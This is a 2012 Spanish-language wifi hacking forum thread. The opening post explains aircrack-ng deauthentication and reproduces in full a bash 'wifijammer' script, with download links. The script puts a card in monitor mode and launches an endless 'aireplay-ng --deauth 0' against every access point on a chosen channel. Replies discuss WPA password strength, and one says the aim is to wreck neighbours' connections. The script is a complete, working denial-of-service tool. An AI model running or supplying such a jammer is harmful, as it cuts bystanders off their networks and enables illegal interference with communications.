Usuario: Contraseña:
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Autor Tema: dejo un post tal cual lo encontre que tobia no e podido probar  (Leído 1016 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado dvdr

  • BacktrackMan
  • Trade Count: (0)
  • *****
  • Mensajes: 784
  • Colaboraciones +47/-0
  • Sexo: Masculino
  • Loco por el Wifi
Bueno amigos, resulta q estuve haciendo auditorias wifi dentro del edificio donde me alojo.
Y la mejor forma de probar la seguridad de las mismas es tratando de entrar a esas redes... y si yo no puedo entrar, pues ellos tampoco... :smile: (na mentira, es una forma de decir...)

Muchos conoceran el uso de la suite aircrack-ng, otros pocos conoceran el modulo aireplay-ng y algunos menos entenderan como funciona la Desautenticacion....

Por lo cual paso a explicarles... La opcion -0 o su equivalente --deauth se utiliza para "voltear" (un poco o mucho) la conexion de maquinas dentro de la red a auditar... para que? Depende :

Si es una WEP para acelerar el proceso de inyeccion de paquetes (crece el #data)
Si es una WPA / WPA2 para capturar el handshake

No me voy a detener en ambas explicaciones porque escapa al tema q quiero presentar...

Pero q pasa si utilizamos un "--deauth" infinito ? pues lo mas probable es que, si nuestros vecinos estan FISICAMENTE muy cerca, NO puedan usar su conexion, por lo cual NO disfrutarian de las bondades de Internet...

Bien, los que estamos acostumbrados a usar el aircrack y todas sus variantes, esto es pura chachara y bien sabido... (o no) :g:
Por lo cual, TODO absolutamente todo mostrado en este post, se puede hacer por linea de comandos con la suite aircrack-ng sin nada adicional
Pero ...como hay muchos lammercillos dando vuelta q no saben de q co?o les estoy hablando...
Para ELLOS encontre una simple herramienta (script) que les soluciona TODO o casi...

Estoy hablando del wifijammer. Que hace ? pues todo automaticamente. Lo descargan, lo ejecutan, eligen el canal y empieza a desautenticar a todos los ordenadores de todas las redes disponibles alrededor (o bien, uno filtra las q quiere y las q no)

Con esta herramienta llammerotes (sin casi ningun conocimiento) pueden atacar nuestras redes wifi, sin q haya un remedio efectivo...
(Si alguien conoce algun metodo para parar este ataque que me lo haga saber)

Es por eso que recomendamos NUNCA usarla en detrimento de nuestros vecinos...

codigo
Citar
#!/bin/bash
# This is a bash based wifi jammer. It uses your wifi card
# to continuously send de-authenticate packets to every client
# on a specified channel... at lest thats what its suppose to do.
# This program needs the Aircrack-ng suit to function
# - and a wifi card that works with aircrack.
# Checks if this file is being ran as root.
if [ x"`which id 2> /dev/null`" != "x" ]
then
USERID="`id -u 2> /dev/null`"
fi
if [ x$USERID = "x" -a x$UID != "x" ]
then
USERID=$UID
fi
if [ x$USERID != "x" -a x$USERID != "x0" ]
then
#Guess not
echo Run it as root ; exit ;
fi
# Changes working directory to the same as this file
DIR="$( cd "$( dirname "$0" )" && pwd )"
cd $DIR
# Sets first command line VAR
WIFIVAR="$1"
#Checks if user specified a WIFI card
if [ x"$WIFIVAR" = x"" ]
then
echo "No wifi card specified, scanning for available cards (doesnt always work)"
USWC="no"
else
echo "Using user specified wifi card ""$WIFIVAR"
USWC="yes"
fi
if [ x"$USWC" = x"no" ]
then
# Uses Airmon-ng to scan for available wifi cards.
airmon-ng|cut -b 1,2,3,4,5,6,7 > clist01
count=0
if [ -e "clist" ]; then
rm clist
fi
cat clist01 |while read LINE ; do
if [ $count -gt 3 ];then
echo "$LINE" | cut -b 1-7 | tr -d [:space:] >>clist
count=$((count+1))
else
count=$((count+1))
fi
done
rm clist01
WIFI=`cat clist`
echo "Using first available Wifi card: `airmon-ng|grep "$WIFI"`"
echo "If you would like to specify your own card please do so at the command line"
echo "etc: sudo ./wifijammer_0.1 eth0"
rm clist
else
WIFI="$WIFIVAR"
fi
#Check for a wifi card
if [ x"$WIFI" = x"" ]; then
#Guess no wifi card was detected
echo "No wifi card detected. Quitting"
exit
fi
#Start the wireless interface in monitor mode
if [ x"$airmoncard" != x"1" ]; then
airmon-ng start $WIFI >tempairmonoutput
airmoncard="1"
fi
#Looks for wifi card thats been set in Monitor mode
if [ x"$testcommandvar02" = x"" ];then
WIFI02=`cat tempairmonoutput|grep "monitor mode enabled on" |cut -b 30-40 | tr -d [:space:] |tr -d ")"`
if [ x$WIFI02 = x ];then
WIFI02=`cat tempairmonoutput|grep "monitor mode enabled" |cut -b 1-5 | tr -d [:space:]`
fi
WIFI="$WIFI02"
rm tempairmonoutput
fi
echo "$WIFI"
# Asks user to specify a channel to jam, or to see a 40 second scan of the area
read -p "Please specify a channel to jam, or type in 'scan' (without quotes) to see airodump's output for 40 seconds:" NUMBER
# If something was entered that was not "scan" then assume its a number and continue
if [ x"$NUMBER" != x"scan" ];then
CHANNEL="$NUMBER"
else
# scan was entered, so start airodump-ng in channel hopping mode to scan the area
airodump-ng $WIFI &
SCANPID=$!
sleep 40s
kill $SCANPID
sleep 1s
# Asks user to specify a channel
read -p "Please specify a channel to jam:" NUMBER
CHANNEL="$NUMBER"
fi
# Launches airodump-ng on specified channel to start gathering a client list
rm *.csv
xterm -fn fixed -geom -0-0 -title "Scanning specified channel" -e "airodump-ng -c $NUMBER -w airodumpoutput $WIFI" 2>/dev/null &
# Removes temp files that are no longer needed
rm *.cap 2>/dev/null
rm *.kismet.csv 2>/dev/null
rm *.netxml 2>/dev/null
# Makes a folder that will be needed later
mkdir stationlist 2>/dev/null
rm stationlist/*.txt
# Start a loop so new clients can be added to the jamming list
while [ x1 ];do
sleep 5s
# Takes appart the list of clients and reorganizes it in to something useful
cat airodumpoutput*.csv|while read LINE01 ; do
echo "$LINE01" > tempLINE01
LINE=`echo $LINE01|cut -f 1 -d ,|tr -d [:space:]`
rm tempLINE01
# Ignores any blank
if [ x"$LINE" != x"" ];then
if [ x"$LINE" = x"StationMAC" ];then
start="no"
fi
if [ x"$start" = x"yes" ];then
if [ -e stationlist/"$LINE".txt ];then
echo "" 2>/dev/null
else
# Lauches new window with de-authenticate thingy doing it's thing
xterm -fn fixed -geom -0-0 -title "Jamming $LINE" -e "aireplay-ng --deauth 0 -a $LINE $WIFI" &
echo "$LINE" > stationlist/$LINE.txt
fi
fi
if [ x"$LINE" = x"BSSID" ];then
start="yes"
fi
fi
done
done
descarga oficial del mismo
http://www.mediafire.com/?d56lj5787pn5i5d
 http://code.google.com/p/wifijammer/

« Última modificación: 10 de Marzo de 2012, 11:07:29 pm por papones »
BLOG <object width="425" height="350" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/ shockwave/cabs/flash/swflash.cab#version=8,0,0,0"> <param name="movie" value="http://www.milinkito.com/swf/america.swf"/> <embed src="http://www.milinkito.com/swf/america.swf" width="425" height="350" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/> </object>

Desconectado ele

  • V.I.P
  • Trade Count: (0)
  • **
  • Mensajes: 69
  • Colaboraciones +3/-0
  • Sexo: Masculino
  • Loco por el Wifi
Re:dejo un post tal cual lo encontre que tobia no e podido probar
« Respuesta #1 en: 11 de Marzo de 2012, 06:37:29 am »
  • Publish
  • interesante pero tambien te faltan poner las OPN o se seguridad abierta si estan tienen un servidor usan filtrad mac para habilitar el internet el mismo caso podria darse en una wpa wpa/psk y tmb los famosos mitrokit q se instalan hay un sinfin de herramientas no habia escuchado del wifihameer la verdad pero por lo describes es lo mismo que el AIROSCRIPT sin conocimientos starias hackeando una red wep ya que para una wpa necesitas un diccionario.
    Aca lo mas seguro es usar WPA ya que esta necesita diccionario y no todos saben como hacerlo funcionar.
    WPA ahi combina tu clave entre caracteres numeros letras mas de 8 te recomiendo 12 combinando todo.
    Ya que a mayor dificultad de la clave que pusistes mayor tiempo tardara el diccionario en encontrarla CLARO si es que la clave q pusistes esta en el diccionario xq si no lo esta ya fue...
    Proteger tu red contra Snifeos robo de cookies incluso he escuchado de los RECURSOS COMPARTIDOS PUERTO 139 ya que muchas personas me incluyo no ponia clave lo dejaba libre x ahi es una puerta de entrada para cualquier persona que quiera robarte informacion y usarlo para sus fines personales.
    Pero espero no haberte enredado con mis palabras.
    Seguro aca PAPONES DVDR etc etc te responderan mejor que yo.
    Saludos.  :cheesy:

    Desconectado dvdr

    • BacktrackMan
    • Trade Count: (0)
    • *****
    • Mensajes: 784
    • Colaboraciones +47/-0
    • Sexo: Masculino
    • Loco por el Wifi
    Re:dejo un post tal cual lo encontre que tobia no e podido probar
    « Respuesta #2 en: 11 de Marzo de 2012, 10:05:30 am »
  • Publish
  • pues no tengo como probarlo
    ¡¡en resumen creo que no se trata de sacar la clave si no joderle su  conexion
    BLOG <object width="425" height="350" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/ shockwave/cabs/flash/swflash.cab#version=8,0,0,0"> <param name="movie" value="http://www.milinkito.com/swf/america.swf"/> <embed src="http://www.milinkito.com/swf/america.swf" width="425" height="350" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/> </object>

    Desconectado papones

    • Administrador
    • Trade Count: (0)
    • *****
    • Mensajes: 8512
    • Colaboraciones +195/-5
    • Sexo: Masculino
    • La paciencia la madre de la ciencia
      • Locos Por El Wifi
    Re:dejo un post tal cual lo encontre que tobia no e podido probar
    « Respuesta #3 en: 11 de Marzo de 2012, 06:25:05 pm »
  • Publish
  • Yo no voy a responder nada,no me gusta el tono de """""SUPERLISTONOLAMER"""""" que lo describe,asi
    que le den
    Wpa con dicc todo lo demás no son ataques wpa si no fallos de seguridad de routers y sistemas

    Que te gustan las herramientas mikrotik y el so mikrotik?Es un mundo ,yo tengo un routerboard 433uah
    con 3 minipci atheros,lo mas para enredar jaja
    « Última modificación: 11 de Marzo de 2012, 06:25:14 pm por papones »
    Lease las normas del foro si es tan amable
    http://www.auditoriaswireless.net/index.php/topic,3.0.html
    Presentese  a la comunidad en el apartado del foro PRESENTACIONES

     

    Dumpper All V.x.x

    DUMPPER WPS PENTESTING

    Facebook Comments